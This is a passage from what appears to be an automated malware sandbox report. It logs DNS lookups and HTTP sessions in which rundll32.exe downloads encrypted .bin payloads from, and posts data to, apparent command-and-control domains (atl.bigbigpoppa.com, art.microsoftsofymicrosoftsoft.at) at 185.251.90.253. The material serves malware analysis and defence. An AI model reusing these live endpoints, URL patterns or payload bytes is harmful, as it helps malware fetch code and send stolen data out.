                                                            Sep 10, 2021 11:14:24.295125008 CEST53500108.8.8.8192.168.2.6
                                                            Sep 10, 2021 11:14:24.419068098 CEST6371853192.168.2.68.8.8.8
                                                            Sep 10, 2021 11:14:24.454663038 CEST53637188.8.8.8192.168.2.6
                                                            Sep 10, 2021 11:14:25.038269997 CEST6211653192.168.2.68.8.8.8
                                                            Sep 10, 2021 11:14:25.075001001 CEST53621168.8.8.8192.168.2.6
                                                            Sep 10, 2021 11:14:35.678008080 CEST6381653192.168.2.68.8.8.8
                                                            Sep 10, 2021 11:14:35.711908102 CEST53638168.8.8.8192.168.2.6

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                            Sep 10, 2021 11:13:44.136544943 CEST192.168.2.68.8.8.80x7fc5Standard query (0)atl.bigbigpoppa.comA (IP address)IN (0x0001)
                                                            Sep 10, 2021 11:13:45.104943991 CEST192.168.2.68.8.8.80x6ca5Standard query (0)atl.bigbigpoppa.comA (IP address)IN (0x0001)
                                                            Sep 10, 2021 11:13:46.440280914 CEST192.168.2.68.8.8.80xf8fStandard query (0)atl.bigbigpoppa.comA (IP address)IN (0x0001)
                                                            Sep 10, 2021 11:14:24.268157959 CEST192.168.2.68.8.8.80x2a00Standard query (0)resolver1.opendns.comA (IP address)IN (0x0001)
                                                            Sep 10, 2021 11:14:24.419068098 CEST192.168.2.68.8.8.80x134bStandard query (0)art.microsoftsofymicrosoftsoft.atA (IP address)IN (0x0001)
                                                            Sep 10, 2021 11:14:25.038269997 CEST192.168.2.68.8.8.80x4160Standard query (0)art.microsoftsofymicrosoftsoft.atA (IP address)IN (0x0001)
                                                            Sep 10, 2021 11:14:35.678008080 CEST192.168.2.68.8.8.80xbc3Standard query (0)art.microsoftsofymicrosoftsoft.atA (IP address)IN (0x0001)

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                            Sep 10, 2021 11:13:44.164992094 CEST8.8.8.8192.168.2.60x7fc5No error (0)atl.bigbigpoppa.com185.251.90.253A (IP address)IN (0x0001)
                                                            Sep 10, 2021 11:13:45.411726952 CEST8.8.8.8192.168.2.60x6ca5No error (0)atl.bigbigpoppa.com185.251.90.253A (IP address)IN (0x0001)
                                                            Sep 10, 2021 11:13:46.473021030 CEST8.8.8.8192.168.2.60xf8fNo error (0)atl.bigbigpoppa.com185.251.90.253A (IP address)IN (0x0001)
                                                            Sep 10, 2021 11:14:24.295125008 CEST8.8.8.8192.168.2.60x2a00No error (0)resolver1.opendns.com208.67.222.222A (IP address)IN (0x0001)
                                                            Sep 10, 2021 11:14:24.454663038 CEST8.8.8.8192.168.2.60x134bNo error (0)art.microsoftsofymicrosoftsoft.at185.251.90.253A (IP address)IN (0x0001)
                                                            Sep 10, 2021 11:14:25.075001001 CEST8.8.8.8192.168.2.60x4160No error (0)art.microsoftsofymicrosoftsoft.at185.251.90.253A (IP address)IN (0x0001)
                                                            Sep 10, 2021 11:14:35.711908102 CEST8.8.8.8192.168.2.60xbc3No error (0)art.microsoftsofymicrosoftsoft.at185.251.90.253A (IP address)IN (0x0001)

                                                            HTTP Request Dependency Graph

                                                            • atl.bigbigpoppa.com
                                                            • art.microsoftsofymicrosoftsoft.at

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.2.649818185.251.90.25380C:\Windows\SysWOW64\rundll32.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Sep 10, 2021 11:13:44.229778051 CEST8269OUTGET /LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44euzNQd9TRf/1Zb3P4q5F0mc0qdltC/bLlV5uCsx/obqe2ve9g7Th5DnAa17u/ifRiDnyBBWyxfspwjbc/4e64zsAjWvHHh07WM2IgYy/t1JnmxqkM0edm/B_2Fp0Xl/aO6EV9JJQOgg5QsFoCbzQfO/_2BOZLcUIR/ooMrpCxMndVWwPntp/mvRIBZb_2B_2/Beg4_2F_2Fr/I_2FcfrvgLZ_2F/J3NCkzqZf5_2Fr1C_2BZp/h9SFOIo1qkmT8Tal/3qdDBO5XKEdw_2F/4xqo8eXRx/pJscFz7Rq/r HTTP/1.1
                                                            Cache-Control: no-cache
                                                            Connection: Keep-Alive
                                                            Pragma: no-cache
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                            Host: atl.bigbigpoppa.com
                                                            Sep 10, 2021 11:13:44.704672098 CEST8270INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Fri, 10 Sep 2021 09:13:44 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 194718
                                                            Connection: close
                                                            Pragma: public
                                                            Accept-Ranges: bytes
                                                            Expires: 0
                                                            Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                            Content-Disposition: inline; filename="613b21c8a5648.bin"
                                                            Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                            X-Content-Type-Options: nosniff
                                                            Data Raw: 76 74 cf a8 dc 9e a3 bd 80 c4 22 74 d6 90 04 f4 7c 4e 89 f9 f5 f6 c3 41 5b bd 9a c1 75 03 9e 3d 57 c7 97 06 3e 33 1a 75 cb d2 f3 9b 82 f7 12 da 1b 73 aa 9d 83 1c 06 cc d0 bb fa 6b fe fc 69 45 21 fd 77 4d e8 65 62 93 d4 4f 54 c0 7f 4b c0 e8 bd 0a da 21 85 09 52 e0 63 30 82 6b 84 0b a5 73 0e d8 b6 0a 2f f6 82 b8 db 3a 51 f5 d1 6c 17 f8 66 f5 63 27 a8 2c fe 79 31 d3 11 a2 68 ab eb bd c6 ca 96 b7 df 24 d9 bb eb 81 ee 0f 54 d0 24 37 17 2e bd d0 90 a9 1c c7 0d aa a5 e0 95 ad 52 e0 75 84 91 a6 10 9d 81 0a 4d b4 ff 81 97 74 92 63 92 3b ae a9 ad cf 50 57 12 53 8f 24 c5 3c d5 ff c4 5c 06 b9 e4 02 71 34 b3 6a f5 02 c6 06 6d 8c 5a b2 93 69 e3 04 8d c3 27 8a b8 c8 4a 1d cd c2 0f bd 3f 7e 06 be 38 ae a8 33 f4 46 25 b7 42 e8 60 df af 0a cb 9a 44 a1 2f 47 30 4b a6 62 22 1a 9b 17 41 04 1f fe a9 a5 c2 5f 2c b8 17 b3 7e f8 a3 b1 19 c2 e2 ac 4f 23 9a 3a 3a bf c4 61 f5 b6 7d d8 d5 41 f7 c6 7d 13 a3 25 bd bd b7 45 09 64 a8 d5 8a 6a 6e 18 90 f8 15 29 9d ad e6 f7 81 c6 c1 6d 32 c6 6d 91 e1 d5 b2 11 af d7 0f ae c5 84 22 1e 0f 3d 2a 0d 19 79 94 9f 72 e4 19 30 54 53 f8 a0 51 28 95 77 e8 05 cd 58 f3 5e 79 1b 2d 75 16 31 f4 ea 58 42 da fe ad 9f 21 09 f9 67 69 cf ff c7 a6 bd 34 2a ef 9a e2 63 bf 8b 7d 44 e0 80 ea 5d fb 18 21 db 02 cf db ca 07 81 b4 3e 7a 72 00 1b 21 ff 30 31 fa d2 ce c6 9f 33 9a cd 1a 25 3c f7 05 4d c2 77 5e 4f fc 99 c8 f0 51 93 7e e9 b2 35 93 c2 cc 3e bd 22 41 3e a6 14 a2 f9 47 45 a0 94 00 2b c8 09 2c 57 1c 70 d1 fc 8b 98 bd a9 53 f3 48 aa d4 87 c8 34 d1 84 66 95 bf 45 78 59 ad 24 31 f2 22 9f 83 2e 85 ee f9 50 21 68 9f ec 2e 0f 0a 37 cc a4 dc 12 79 1e 10 12 9d 19 93 bc cf 36 df 7c 6f 25 8f bc 3a 4c 53 73 0d ae 15 56 83 9e fa 88 d5 7f 9b ee e9 dc ff 92 38 f9 91 3c bf b0 a9 0d 4a 43 73 58 68 19 46 a8 b0 e3 17 3d 9c 68 30 37 f6 84 d2 c7 37 01 33 97 44 91 e5 20 3f a7 d9 e3 c0 af b0 2a 54 8f ef ab aa 06 35 5f 5b c2 66 54 41 fd bb d8 8a 29 80 3d 5d d0 8d 84 9f 53 68 db f0 5a 42 de 57 66 fa 72 b7 72 97 f3 0f 0d 65 28 85 1c 27 e4 ff f8 ed 8c 53 c2 a4 9a ad fe 7d c9 57 1e f2 ae f2 d6 35 08 89 64 bd 41 a1 00 d8 bb 74 05 14 0c 5e ca 85 87 26 07 a5 14 0f 34 11 c2 c5 18 a1 ed ce fd da 89 22 fb f0 a7 a2 50 4a 11 f6 48 c3 b2 8a f3 91 ca 09 4a d9 01 f7 fb 10 4d a4 ed cd 67 f7 fa bf df 33 2d 23 30 89 ba 79 e8 a3 8e 23 56 d9 30 2e 33 d2 7b 11 d1 09 3f 4a 40 d9 21 e7 c3 99 10 06 48 49 e6 26 34 2f c8 84 6f b9 66 4b 96 6e 4d 8a 42 85 99 f6 5f 76 29 de 4e c0 fb 1d 3a 19 52 46 73 7a 7f e9 46 b5 05 4b 3e 44 54 27 2b d1 39 05 34 e3 7e 5b e3 e8 52 d3 26 d5 f4 0e c9 1e 3e 6f 47 1f 11 ed 46 0f 00 f0 d5 53 bd 47 1f 3e ad 02 09 9b 96 3d ce 9d cc 58 7d 5e 62 8b 69 88 05 00 61 0d b0 69 2c da a1 ec e0 02 19 38 28 c5 c3 c1 00 80 82 e8 27 0d 0c 48 62 cf b4 e4 fb fa 1e 90 42 0e d8 9a 95 7b f2 ae 5f f6 77 d3 ea f5 b8 f3 4e 21 a0 bc 9b e0 df 6e 4c 75 0c 36
                                                            Data Ascii: vt"t|NA[u=W>3uskiE!wMebOTK!Rc0ks/:Qlfc',y1h$T$7.RuMtc;PWS$<\q4jmZi'J?~83F%B`D/G0Kb"A_,~O#::a}A}%Edjn)m2m"=*yr0TSQ(wX^y-u1XB!gi4*c}D]!>zr!013%<Mw^OQ~5>"A>GE+,WpSH4fExY$1".P!h.7y6|o%:LSsV8<JCsXhF=h0773D ?*T5_[fTA)=]ShZBWfrre('S}W5dAt^&4"PJHJMg3-#0y#V0.3{?J@!HI&4/ofKnMB_v)N:RFszFK>DT'+94~[R&>oGFSG>=X}^biai,8('HbB{_wN!nLu6


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.2.649819185.251.90.25380C:\Windows\SysWOW64\rundll32.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Sep 10, 2021 11:13:45.468758106 CEST8471OUTGET /yycLCxNRZEFU2J4UrQOl/FX7uF3nnSEu1rXBTN4d/LylqoAvPuubQ7SHiRZfBKF/4dapCnHjf6OGO/yl6rivKE/fgvQJKMe8TaTP5ycHGNAJUS/0YTRa2nWMo/en2LMiL2tQIZKUpol/smZ_2B4BmeyI/57ObWaf9NZW/uHAXXMRRQnyL7K/pZ21NZyhAYoU6jMX_2FXx/_2F1viwpW6B_2BQx/yytF1Qgt5sD6QuY/yCiBnG89B2zLl6ouYK/ovFfokaNC/WnbbXZP7gD7mtpGqOSST/2_2Fq_2BjMeuOfq6Yo5/TugSOTNVmBx8AK0VzEQO9D/fxXdG0idPk4t/207vRTOEh/oW HTTP/1.1
                                                            Cache-Control: no-cache
                                                            Connection: Keep-Alive
                                                            Pragma: no-cache
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                            Host: atl.bigbigpoppa.com
                                                            Sep 10, 2021 11:13:45.958228111 CEST8473INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Fri, 10 Sep 2021 09:13:45 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 247965
                                                            Connection: close
                                                            Pragma: public
                                                            Accept-Ranges: bytes
                                                            Expires: 0
                                                            Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                            Content-Disposition: inline; filename="613b21c9e3005.bin"
                                                            Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                            X-Content-Type-Options: nosniff
                                                            Data Raw: df af 1f 2c c7 7a 76 2e c4 65 52 d8 c5 96 95 66 6a 34 f7 62 f3 c6 81 d9 07 0e bc 4f 56 08 9d 0e 1c 30 b4 bc 8a 54 30 49 14 87 4f 11 78 79 9f a5 a3 c1 f0 f2 71 2a ab 5d ad b6 19 fb 7b e5 e8 5b b1 62 55 09 08 fa c4 b5 12 c3 58 e0 61 dc 69 59 43 ce 7f 7f be b9 36 0f 6f 2d cb 03 0c d4 8d ae 5e 2a 57 59 70 5a c4 7f 2f 72 cd e3 ba d8 80 d9 b2 c2 8d 36 2b 7d ec 9a d1 b3 92 2d dc 89 30 84 5d 9f f1 67 43 50 67 cc 6a 54 29 3d d6 af a8 16 68 8b 15 cd 1d f4 eb 98 08 70 c8 a5 8a c3 af e2 e1 69 de 42 28 d0 e9 c8 68 6d 52 20 18 a9 57 02 5d 75 76 9a 12 b6 c4 3e 11 ce 5b da e7 66 f2 d6 01 98 15 84 59 bf 42 3a e6 5e dd 98 29 46 a9 d9 33 3a 8d 4f f4 ac 9c ba 0f 5a 3d 9b 82 78 38 73 e6 b5 cc fe 07 e1 cd 3d c3 bc bd 64 86 62 56 ad c9 8a 57 f7 4e 67 9c 19 37 56 46 21 d2 be ee 2a 75 32 18 f6 b7 17 1d 9f bb 4d 5f 52 cd 18 c5 8e 3c 94 fc 59 3b 5a bb af ad d5 e6 75 99 11 80 40 1a fa fd 9d 25 e5 7b f8 e3 92 5d 13 32 74 46 66 44 f4 f3 8e 21 47 18 9c 4c 91 b6 41 4b 4b f0 af 08 9e f3 4c 5a 25 fd 03 1e b2 09 8f 24 8f f6 be a3 52 9b c9 e9 0c 6a 62 9b 77 94 dc 2f 41 cd cc 76 66 e6 fc 0e 5e 3c 65 ba 6c a0 7b c9 40 af 6e ee 00 e7 c5 62 5e 5d d7 40 0e 9e c3 cb fb 58 34 6e 3e 7e ca 8a 3c d4 5b 01 fc 92 41 bc 19 55 5a 7a 2f 0d 15 e4 db e0 04 58 d9 17 09 24 0f a9 87 2a 33 ff 80 96 5e 10 c5 23 08 84 8b 27 d8 28 72 98 80 ed 0b c1 94 72 4e 1a 87 af 77 e2 f9 55 74 96 83 c4 50 e0 0e da b4 d5 27 2b e9 09 c7 ee e3 3f 06 68 a6 63 ab 09 16 3c 1e c7 a0 69 47 d9 36 00 08 83 b2 99 76 9f f6 8b 62 b1 d9 f4 c3 ed 59 1f 04 14 ef ea 3d 35 8e 61 6b 5f 69 f4 c1 5a 8a e1 c4 28 46 cf 23 fb a9 a8 b3 2e fc 57 52 94 15 c3 0a c3 12 34 b6 d8 a0 0b 1f c0 f2 12 4f 3d 45 b7 9d 3b cf c5 79 c6 be 37 15 1c 53 e5 dc 3e fc 42 e0 4e 9b 3e c4 e6 64 a3 74 23 83 d6 07 0c e1 6b 62 e1 6a a5 7e f7 ca 83 67 30 f8 8a cc c6 47 e6 8c d3 c5 6c 79 f6 f7 79 8b c2 a5 5c 6d 45 a3 37 8d d8 fc d8 99 ef 07 b0 9b 39 83 ff bc b0 6f 4e 5d f9 62 10 42 d6 c8 58 f9 f0 56 ac 6a 96 46 1d f0 6b bd f8 b2 82 69 29 9f a3 fa a7 f4 b5 96 17 09 74 01 5a 9b f5 e1 89 8a dd 96 5c 77 36 9b 1b fe 72 df 5e 6a 1a d5 ff 61 62 fd b1 ea 2d 89 fb d1 11 5c 30 cb ea 6e 42 2d 36 34 c8 a1 93 06 33 c5 8a 81 a6 4a de 57 53 65 11 e7 9c 9d ea 6e aa dc f9 0e 90 ec 29 c5 9f 4e 6b 47 01 13 61 05 77 55 a1 0e 96 ee 2a ed 63 85 62 93 f3 51 68 dd c4 79 b3 40 6f 8f e4 29 2e 5b 5b 31 95 9f 22 ed 22 00 05 35 fa b5 f2 91 73 fa 06 ca c4 85 6f ea 84 12 6f 1d cc e0 7a 7a 41 f5 16 df 63 f2 ce c2 cd 0d f2 fa 10 24 6a e1 e0 fb 5f 7f 4b 0c 50 5d 71 d6 63 38 66 6e f0 ea 85 52 52 f4 4e 32 da 21 a9 2a 30 1d 58 1f 70 0d af 01 71 28 de b7 26 ed 97 36 ca 6b 7e 0b c6 08 74 65 f1 77 c1 28 ab a4 6b 08 e7 fc 68 59 3e 8c 41 10 b0 98 01 4e 57 f8 11 ba 47 df 3d 97 d6 1e 49 e2 f4 66 c3 68 ae 75 3c 6b 70 74 9c 71 ff c1 59 88 e7 ac 4d c7 c5 19 5a 24 6c 08 13 7c d9
                                                            Data Ascii: ,zv.eRfj4bOV0T0IOxyq*]{[bUXaiYC6o-^*WYpZ/r6+}-0]gCPgjT)=hpiB(hmR W]uv>[fYB:^)F3:OZ=x8s=dbVWNg7VF!*u2M_R<Y;Zu@%{]2tFfD!GLAKKLZ%$Rjbw/Avf^<el{@nb^]@X4n>~<[AUZz/X$*3^#'(rrNwUtP'+?hc<iG6vbY=5ak_iZ(F#.WR4O=E;y7S>BN>dt#kbj~g0Glyy\mE79oN]bBXVjFki)tZ\w6r^jab-\0nB-643JWSen)NkGawU*cbQhy@o).[[1""5soozzAc$j_KP]qc8fnRRN2!*0Xpq(&6k~tew(khY>ANWG=Ifhu<kptqYMZ$l|


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2192.168.2.649820185.251.90.25380C:\Windows\SysWOW64\rundll32.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Sep 10, 2021 11:13:46.525415897 CEST8730OUTGET /HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNWGS38iu6HBSu0eZQC/bmSTwgO68w/mDzLSD0yv5NsCWUYa/KrMPefIXTo7Y/kYocGyKbfHI/qpROOMC7W3BpuS/FiHxn9Vj_2BE_2BRO1MPS/HSvVFR_2FvFubdta/FMJR0bw3OFOckhz/gihVzVqSiIHGsYLcl_/2FiUzDnO5/Znp2qHqDPmJt_2FKhKU2/B1dWx_2FKsmf5DpcS8Z/eu7lOAGu9ogHBSfDIGfPdL/lCnFrX6yLs9rJ/djJKkMKB/PGYeMNf7nd3nwYWaABiF0QM/d HTTP/1.1
                                                            Cache-Control: no-cache
                                                            Connection: Keep-Alive
                                                            Pragma: no-cache
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                            Host: atl.bigbigpoppa.com
                                                            Sep 10, 2021 11:13:46.980617046 CEST8731INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Fri, 10 Sep 2021 09:13:46 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 1958
                                                            Connection: close
                                                            Pragma: public
                                                            Accept-Ranges: bytes
                                                            Expires: 0
                                                            Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                            Content-Disposition: inline; filename="613b21cae78b7.bin"
                                                            Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                            X-Content-Type-Options: nosniff
                                                            Data Raw: e9 b6 e3 58 66 dc 15 e4 80 de 6a 7c ed d6 c7 9c 13 7d 2c 30 77 87 0a 58 42 4f 0c 73 1f 5e 59 8b 56 46 5d 4a 82 ce db d3 96 28 96 67 b2 d9 1f 00 59 45 b0 8c b2 61 18 2b 75 9c 48 e8 bf 1e 63 6a 93 01 16 d9 d4 d8 0c 1b 0c 86 dc 63 18 46 b6 8f 9b 93 82 62 69 05 d5 22 40 61 ec 38 93 63 30 cf 27 cf b5 5a 73 96 99 fb 5a 58 26 be 6b cf 20 54 04 07 86 78 37 b8 dc d2 3e 0a 51 0a 93 2e 44 c6 45 b5 97 49 ae 63 08 c1 9a b7 91 3c 36 23 9e 3b 96 a6 8e 27 f3 ae 6d 81 74 d0 a5 ee 42 c9 6e 24 9c 79 77 39 30 c5 ec 88 f0 e0 9d 50 5a 4c 58 4b f3 76 c5 32 5d 99 91 e6 92 45 c8 f0 57 ba d4 51 09 eb 9c 83 ba 5a 63 eb f9 7b bd 94 1e 50 13 84 5b e2 3e 83 f5 22 fd f7 a5 d5 c0 c8 96 9b d1 89 d4 ff 01 22 42 23 46 76 98 d8 4e 56 a0 2f 0d 4a 4d 5d dc a7 4c 96 0f 80 0b 1e 9b 14 eb ce d5 55 5d 16 1b 47 1e 1f a9 b5 09 9e 3b 23 36 8d b3 e8 1d 28 5c f9 37 96 7c a1 c3 f5 07 66 93 ee f9 bb 51 93 46 d0 db b5 0b 9a c3 20 06 22 22 e4 f0 c2 9c 88 3e c3 31 5f 69 91 2c c2 59 c2 97 3a 61 33 85 fb b9 24 5f e1 e8 cf b8 e3 35 49 b3 47 1b b8 85 13 13 5d 52 2f e4 3d e9 1e f8 5d c0 92 68 34 a9 42 63 94 9f f4 75 15 d2 f9 0e f7 66 3a 25 73 77 bf 67 ff 68 e9 69 1a 8b 64 84 99 dc cb 68 2e d3 d5 fe 14 6c 30 11 29 61 8c 54 d8 17 6a cb 99 62 90 fc f1 30 cd 6d 51 80 9e 75 62 c1 1c 7c 57 58 13 3b 80 77 28 fd 65 bc 66 c2 a7 31 79 83 9a 47 db 81 bb 35 2f 99 6d ba 2d e0 66 0e 08 a2 70 b9 83 3b 89 0b d3 35 82 68 71 06 0b 96 ce 50 4d e4 4f 7c 23 88 92 17 23 c4 07 bb 49 7f 90 42 e4 bf ad cb cb f1 df e8 96 37 66 4f 9e b3 4a d6 5f 60 90 f2 c4 48 9a b3 c1 e1 eb 37 68 39 7a bc 39 fa 83 97 35 b0 cc 5c e1 53 7d a5 5d 6a 46 58 4e 9d bc fd 4f 3d 45 61 4d 82 5d b3 10 69 48 c1 b2 70 04 dc 93 d8 3c 56 a3 d5 ee 7e 44 ca 1e 61 34 d1 c7 f1 a0 92 15 f3 f3 36 c8 6c ea c3 8e 25 3f 86 c1 a0 75 9f cc 7c 43 24 32 f7 8d 06 b5 06 d1 10 f0 43 fa 6b f5 9c 55 fd dd 68 55 7d c7 be e4 c7 3f d6 77 a6 c1 45 1b ba 8b 0a 49 30 a4 cd 6b ad 96 e8 47 a7 f2 6a d2 3e 01 6f de d4 5a 0e 02 e8 d7 fd f8 a3 aa 82 be 26 06 29 29 09 d5 da 13 c1 75 c7 79 88 5d 50 40 66 65 8f b4 05 60 0f fb df 9a dc 52 f1 6a 63 6a bc b3 a6 8a 16 e7 3d a4 a8 34 13 44 aa 5a 2d e6 36 c9 2e bd 77 65 3b b9 50 e7 99 90 45 30 32 db 1d 21 50 ea a2 ee 3b 31 cc c4 af 6d 00 78 ac d7 f0 c2 69 59 02 f7 00 c9 6c 34 d8 4b b1 ae 6d 03 fd f7 1a 3e 5c 32 39 e7 6c 03 88 59 35 98 18 6c b7 40 cc da 2f 04 5f bf 74 8d c4 d0 d1 07 7c 15 cb aa a4 c7 a9 1c 38 25 69 b5 02 1a ab d3 d2 4f 0f 5c 4b b7 35 83 f2 62 3b f9 cd 8c ae a7 f0 9c 1c 31 eb ce 61 97 43 71 13 59 7d ae 6a e6 44 ae 7a 26 c7 83 78 11 a7 15 59 ec e2 f5 f1 32 46 57 ca ec 7d 98 3c 7a c4 6a 15 38 62 ec 4f d3 da 63 c5 8c 7c 6f 3b 34 3f ec 97 c7 99 0b f4 6f 3e 13 27 05 f1 80 9e d1 1b 64 98 22 e7 ea ed 98 35 98 c2 d5 07 34 43 40 b4 bb 67 43 35 a8 23 ca 1d ca 12 66 6a 7e 03 2d d4 61 26 b4 1d b6 cd f9 0b c6 7f
                                                            Data Ascii: Xfj|},0wXBOs^YVF]J(gYEa+uHcjcFbi"@a8c0'ZsZX&k Tx7>Q.DEIc<6#;'mtBn$yw90PZLXKv2]EWQZc{P[>""B#FvNV/JM]LU]G;#6(\7|fQF "">1_i,Y:a3$_5IG]R/=]h4Bcuf:%swghidh.l0)aTjb0mQub|WX;w(ef1yG5/m-fp;5hqPMO|##IB7fOJ_`H7h9z95\S}]jFXNO=EaM]iHp<V~Da46l%?u|C$2CkUhU}?wEI0kGj>oZ&))uy]P@fe`Rjcj=4DZ-6.we;PE02!P;1mxiYl4Km>\29lY5l@/_t|8%iO\K5b;1aCqY}jDz&xY2FW}<zj8bOc|o;4?o>'d"54C@gC5#fj~-a&


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3192.168.2.649821185.251.90.25380C:\Windows\SysWOW64\rundll32.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Sep 10, 2021 11:14:24.508800030 CEST8734OUTGET /M0s2qYX0svCgNwwi/PPI7Xc5SLSkLQIY/5lrOW2oNgPCEjObB3W/rK9MpeZNZ/UBjNTHqn019AlZCIEx5P/tkwag9cTBuiHiomNMOd/c4Fs5ApV0T_2BnjVwW3gyf/bJPiicUJ8f_2F/p_2BzDHN/AttyzxcYoU5_2FqrCObbGoi/jSm_2BVGxu/KGJY3tUfrdwytDYZ_/2BjCzYCnXysU/C2JbU3dlXVl/5uJ7MQlXxw8eLV/q0zaTcL3CTeSA980379DA/dHPHAS9NwOC9V6VK/lP_2FDVrlGe4ayd/LAmEzNRn3GukTSqHPk/HGsc32BVj/4Gvn4Q9G8MH6Q5yTHXJc/ulutZq7s HTTP/1.1
                                                            Cache-Control: no-cache
                                                            Connection: Keep-Alive
                                                            Pragma: no-cache
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
                                                            Host: art.microsoftsofymicrosoftsoft.at
                                                            Sep 10, 2021 11:14:25.026961088 CEST8734INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Fri, 10 Sep 2021 09:14:25 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                            X-Content-Type-Options: nosniff
                                                            Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            4192.168.2.649822185.251.90.25380C:\Windows\SysWOW64\rundll32.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Sep 10, 2021 11:14:25.124227047 CEST8736OUTPOST /W7oPFKe8v92MJK/3s9n12Zlxxip0RpYqadjX/SO7W1_2FF9Pkd4OV/Fr1cAJR5yzwxrV5/Jx7W_2FGpEVbkHb92i/nk7onhk3e/t3LARu0x8PsikCuNcG3A/xVZtlmy23EEwScpeJDo/wvuFYBZUTBSU84oV7Elz6G/vj_2F1HMVCKsF/ltj9usP8/bN_2Bx9_2BXwYInwNajYI72/h9Hrv5vhx_/2F82si9cIkqX7v6R4/9UOOaco5x39h/66X8TzwdR07/vkpw_2FwebnNKA/xttU1J1hU1aqHEwJ_2BPb/e_2FLASBRA3M51hv/aDQxYMFh2bS_2BM53oI/t HTTP/1.1
                                                            Cache-Control: no-cache
                                                            Connection: Keep-Alive
                                                            Pragma: no-cache
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
                                                            Content-Length: 2
                                                            Host: art.microsoftsofymicrosoftsoft.at
                                                            Sep 10, 2021 11:14:25.654230118 CEST8736INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Fri, 10 Sep 2021 09:14:25 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                            X-Content-Type-Options: nosniff
                                                            Data Raw: 62 30 0d 0a 19 9c 8f 14 5b e0 f0 8f 44 d5 b3 b1 b8 a8 31 e8 ea 02 5a b2 11 aa 5f 9d 9d d1 11 25 2c aa 19 08 f0 56 c3 59 3f 83 af 43 a5 ac 32 3f b9 77 47 e2 28 51 16 86 34 8b e0 84 1e 85 c3 8b 75 c8 f9 ac 17 62 5b 8f 9b fd c1 54 41 fb 72 2c a4 fc 49 85 0b 79 2a 6c 52 85 4e 54 4c 7e ff ef a9 3d 93 6b d8 f0 20 b0 23 f1 3e 3c f6 b0 66 8d 40 30 f7 bd 6f f7 84 5e 14 eb bf 5e a0 c4 51 ee a8 18 4a 5d de ea 48 42 6b 34 84 eb cd f6 f5 e4 06 1a b4 bd bb 26 ce 3c cf 0b 41 88 c4 de 21 51 04 bd c7 01 40 8d 32 b3 02 28 db 4a 22 e5 7c 09 40 21 a4 3a 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: b0[D1Z_%,VY?C2?wG(Q4ub[TAr,Iy*lRNTL~=k #><f@0o^^QJ]HBk4&<A!Q@2(J"|@!:0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            5192.168.2.649823185.251.90.25380C:\Windows\SysWOW64\rundll32.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Sep 10, 2021 11:14:35.762507915 CEST8737OUTPOST /08OHsz1N1FvuG6kjmE/aTh0zMsnZ/SI0oUmCO_2BS5MoLEECj/uZ7K5bJdnYQx3WN05uH/v_2Fm83_2BmFHvZHPW65zA/GW0_2BJDiUD1w/ZK6b_2Bh/StY6HpePFkaOsmwn5z64jk4/hNqOPWlFAk/QdUHTQ0be2zDX_2Bp/gFERm0UEw08y/zSKvozh3BGq/IuojbbR5mE_2FM/dq0z5j8vfE1Mb6ztPRP2X/B41DadMfELfCe7ey/X881VUbPPRiD756/vcgjm_2B6diCc8QiJ8/zWiCv09og/LPjcs0IySRyGzo4FtAjY/MaQN7Yj0rwdcUGBU3Lw/cxZIrRpMI9kt/XnFePhCWR/v HTTP/1.1
                                                            Cache-Control: no-cache
                                                            Connection: Keep-Alive
                                                            Pragma: no-cache
                                                            Content-Type: multipart/form-data; boundary=124046255642640572323054504739
